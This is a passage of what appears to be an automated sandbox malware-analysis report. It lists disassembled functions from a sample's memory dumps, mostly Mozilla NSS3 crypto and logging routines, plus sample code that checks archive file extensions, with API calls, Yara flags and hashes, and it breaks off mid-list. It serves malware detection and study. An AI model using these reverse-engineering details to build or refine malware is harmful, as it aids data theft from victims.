                                                                                                                                                                                          • String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest$ndl
                                                                                                                                                                                          • API String ID: 1003633598-923097276
                                                                                                                                                                                          • Opcode ID: b1df4944c066d92697ca64e9a3e2fdd760e69c32add6813e7dbd48fa4987f8e7
                                                                                                                                                                                          • Instruction ID: 278013e893973f44690d5d55e9cb6c2aad075e22ce0f831d1076e6871d070bbc
                                                                                                                                                                                          • Opcode Fuzzy Hash: b1df4944c066d92697ca64e9a3e2fdd760e69c32add6813e7dbd48fa4987f8e7
                                                                                                                                                                                          • Instruction Fuzzy Hash: AB418135601115EFDB009F56DD89A8A3BB1AFC6319F448025E90897A21DB30DD68CF9E
                                                                                                                                                                                          Function 6C574C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C574C4C
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C574C60
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C574CA1
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C574CBE
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C574CD2
                                                                                                                                                                                          • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C574D3A
                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C574D4F
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C574DB7
                                                                                                                                                                                            • Part of subcall function 6C5DDD70: TlsGetValue.KERNEL32 ref: 6C5DDD8C
                                                                                                                                                                                            • Part of subcall function 6C5DDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C5DDDB4
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C4B204A), ref: 6C5207AD
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4B204A), ref: 6C5207CD
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4B204A), ref: 6C5207D6
                                                                                                                                                                                            • Part of subcall function 6C5207A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C4B204A), ref: 6C5207E4
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,6C4B204A), ref: 6C520864
                                                                                                                                                                                            • Part of subcall function 6C5207A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C520880
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,?,6C4B204A), ref: 6C5208CB
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsGetValue.KERNEL32(?,?,6C4B204A), ref: 6C5208D7
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsGetValue.KERNEL32(?,?,6C4B204A), ref: 6C5208FB
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C574DD7
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C574DEC
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C574E1B
                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C574E2F
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C574E5A
                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C574E71
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C574E7A
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C574EA2
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C574EC1
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C574ED6
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C574F01
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C574F2A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 759471828-0
                                                                                                                                                                                          • Opcode ID: 8b654730ed07f3aee80019ca591e23630ab2b9919ad17459c81fa4b0fd37f16b
                                                                                                                                                                                          • Instruction ID: 86036046c6fa0143508cdf71d2cac1a5c26ca78d73e8e93407d82bd4f16a8c30
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b654730ed07f3aee80019ca591e23630ab2b9919ad17459c81fa4b0fd37f16b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FB10475A00205EFDB10EF69DC84AAA77B4BF4A318F054124ED1597B41EB34E9A4CFE2
                                                                                                                                                                                          Function 6C564E60 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 127COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6C564E83
                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C564EB8
                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C564EC7
                                                                                                                                                                                            • Part of subcall function 6C64D930: PL_strncpyz.NSS3(?,?,?), ref: 6C64D963
                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C564EDD
                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C564F0B
                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C564F1A
                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C564F30
                                                                                                                                                                                          • PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C564F4F
                                                                                                                                                                                          • PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C564F68
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                          • String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue$ndl
                                                                                                                                                                                          • API String ID: 1003633598-2103706748
                                                                                                                                                                                          • Opcode ID: 6112d1050788303c8189b39580a2e37a97ea2b16605fb0a68736e21793c2c067
                                                                                                                                                                                          • Instruction ID: d499228f9db4a6b1636a7b8c5e1c8137b481d99271e63cd195801e88e1a18376
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6112d1050788303c8189b39580a2e37a97ea2b16605fb0a68736e21793c2c067
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A41BE35601105EFDB00DF56DC98F9A77B5AB8231DF448424E5089BF61DB309D58CBAE
                                                                                                                                                                                          Function 6C564CD0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 120COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C564CF3
                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C564D28
                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C564D37
                                                                                                                                                                                            • Part of subcall function 6C64D930: PL_strncpyz.NSS3(?,?,?), ref: 6C64D963
                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C564D4D
                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C564D7B
                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C564D8A
                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C564DA0
                                                                                                                                                                                          • PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C564DBC
                                                                                                                                                                                          • PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C564E20
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                          • String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize$ndl
                                                                                                                                                                                          • API String ID: 1003633598-1744907125
                                                                                                                                                                                          • Opcode ID: 1c7c911bf698f231a5fc691cddd7bae6651e043129b052140768dcb0c8dbe70e
                                                                                                                                                                                          • Instruction ID: fdd7827b8ace650a8e1e7867c37260f858a817e0a3a111947bc22cda9d3b7fa9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c7c911bf698f231a5fc691cddd7bae6651e043129b052140768dcb0c8dbe70e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1341B271A01105EFDB00DF16DCD8B6A37B5EB8630DF448425E508ABE61DB309D58CB9E
                                                                                                                                                                                          Function 0003B870 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 65stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,759183C0,00000000,0003C55B,?), ref: 0003B875
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(759183C0,0005613C), ref: 0003B8A3
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(759183C0,.zip), ref: 0003B8B3
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(759183C0,.zoo), ref: 0003B8BF
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(759183C0,.arc), ref: 0003B8CB
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(759183C0,.lzh), ref: 0003B8D7
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(759183C0,.arj), ref: 0003B8E3
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(759183C0,.gz), ref: 0003B8EF
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(759183C0,.tgz), ref: 0003B8FB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                                                          • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                                                                                                                                                          • API String ID: 1659193697-51310709
                                                                                                                                                                                          • Opcode ID: e085eb69964b30d7b2a551e043a1b333d526b43800d78baf94eac9d8d92e40c7
                                                                                                                                                                                          • Instruction ID: 325d6757108b001ad8da667830190dbd367c93654ad8bbf78f00e3c4aae8a454
                                                                                                                                                                                          • Opcode Fuzzy Hash: e085eb69964b30d7b2a551e043a1b333d526b43800d78baf94eac9d8d92e40c7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 32015224BC4726656AA323318D81E7F3F9C4F82F8AF440026EF02E6088EF59D907D5B1
                                                                                                                                                                                          Function 6C588E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C588E01,00000000,6C589060,6C690B64), ref: 6C588E7B
                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C588E01,00000000,6C589060,6C690B64), ref: 6C588E9E
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(6C690B64,00000001,?,?,?,?,6C588E01,00000000,6C589060,6C690B64), ref: 6C588EAD
                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C588E01,00000000,6C589060,6C690B64), ref: 6C588EC3
                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C588E01,00000000,6C589060,6C690B64), ref: 6C588ED8
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C588E01,00000000,6C589060,6C690B64), ref: 6C588EE5
                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C588E01), ref: 6C588EFB
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C690B64,6C690B64), ref: 6C588F11
                                                                                                                                                                                          • PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C588F3F
                                                                                                                                                                                            • Part of subcall function 6C58A110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C58A421,00000000,00000000,6C589826), ref: 6C58A136
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C58904A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C588E76
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
                                                                                                                                                                                          • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
                                                                                                                                                                                          • API String ID: 977052965-1032500510
                                                                                                                                                                                          • Opcode ID: d0b29fab0a838a6824444e40a048a1fb6b4279b4f97b8288dad3c143cec36e92
                                                                                                                                                                                          • Instruction ID: 1b138b52bd7ba80a69a0cffbb856b0529e894144b3b53cafc3e4e18b47706f47
                                                                                                                                                                                          • Opcode Fuzzy Hash: d0b29fab0a838a6824444e40a048a1fb6b4279b4f97b8288dad3c143cec36e92
                                                                                                                                                                                          • Instruction Fuzzy Hash: F161A1B5D01226EBDB10CF55CC80AAFB7B9FF85358F148528DC18A7740E732A915CBA5
                                                                                                                                                                                          Function 6C538E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C538E5B
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE007,00000000), ref: 6C538E81
                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C538EED
                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C6618D0,?), ref: 6C538F03
                                                                                                                                                                                          • PR_CallOnce.NSS3(6C692AA4,6C5912D0), ref: 6C538F19
                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C538F2B
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C538F53
                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C538F65
                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C538FA1
                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(?), ref: 6C538FFE
                                                                                                                                                                                          • PR_CallOnce.NSS3(6C692AA4,6C5912D0), ref: 6C539012
                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C539024
                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C53902C
                                                                                                                                                                                          • PORT_DestroyCheapArena.NSS3(?), ref: 6C53903E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                          • API String ID: 3512696800-3315324353
                                                                                                                                                                                          • Opcode ID: 1f3ebef9505f5086200f5f3c5839c37d0007f5a453657f04d22a2ecf1fd50a20
                                                                                                                                                                                          • Instruction ID: 41f4067c7c62dbc9a5c4f8b102d8a0ca89947e15623867d51ddac22d779a4e4c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f3ebef9505f5086200f5f3c5839c37d0007f5a453657f04d22a2ecf1fd50a20
                                                                                                                                                                                          • Instruction Fuzzy Hash: F55136B2508310ABD7049A559C80FAB73A8ABC575CF44182FF49DD7B80F731E90886A7
                                                                                                                                                                                          Function 000339C2 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitProcessstrtok_s
                                                                                                                                                                                          • String ID: block
                                                                                                                                                                                          • API String ID: 3407564107-2199623458
                                                                                                                                                                                          • Opcode ID: 060b9ce2762db8b825745c3d02a11413ee336195e4ae2fda39cf9e05e5086e97
                                                                                                                                                                                          • Instruction ID: 2367d8f483e3c9d4f6806c7c2b8faf9a37d84d4375b8e074415616c27088e2aa
                                                                                                                                                                                          • Opcode Fuzzy Hash: 060b9ce2762db8b825745c3d02a11413ee336195e4ae2fda39cf9e05e5086e97
                                                                                                                                                                                          • Instruction Fuzzy Hash: C64192B0A40309FFDB515F70AC99E6BBBACFB1870AF505A69E606DA050FB30D644CB50
                                                                                                                                                                                          Function 6C5FCD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C5FCC7B), ref: 6C5FCD7A
                                                                                                                                                                                            • Part of subcall function 6C5FCE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C56C1A8,?), ref: 6C5FCE92
                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C5FCDA5
                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C5FCDB8
                                                                                                                                                                                          • PR_UnloadLibrary.NSS3(00000000), ref: 6C5FCDDB
                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C5FCD8E
                                                                                                                                                                                            • Part of subcall function 6C5205C0: PR_EnterMonitor.NSS3 ref: 6C5205D1
                                                                                                                                                                                            • Part of subcall function 6C5205C0: PR_ExitMonitor.NSS3 ref: 6C5205EA
                                                                                                                                                                                          • PR_LoadLibrary.NSS3(wship6.dll), ref: 6C5FCDE8
                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C5FCDFF
                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C5FCE16
                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C5FCE29
                                                                                                                                                                                          • PR_UnloadLibrary.NSS3(00000000), ref: 6C5FCE48
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
